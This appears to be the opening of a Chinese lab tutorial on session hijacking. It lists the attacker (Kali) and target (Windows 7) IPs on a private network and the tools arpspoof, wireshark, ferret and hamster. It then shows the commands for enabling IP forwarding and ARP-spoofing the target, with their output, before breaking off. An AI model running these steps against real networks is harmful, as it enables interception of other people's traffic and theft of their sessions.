实验环境
攻击机kali IP:192.168.3.147
靶机win 7 IP:192.168.3.128
工具
arpspoof 进行arp欺骗
wireshark 抓包
ferret 重新生成抓包后的文件
hamster 劫持重放流量
1.首先使用arpspoof进行arp欺骗
root@afei:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@afei:~# cat /proc/sys/net/ipv4/ip_forward
1
root@afei:~# arpspoof -i eth1 -t 192.168.3.128 192.168.3.2
0:c:29:fa:a7:a3 0:c:29:3c:60:ad 0806 42: arp reply 192.168.3.2 is-at 0:c:29:fa:a7:a3
0:c:29:fa:a7:a3 0:c:29:3c:60:ad 0806 42: arp re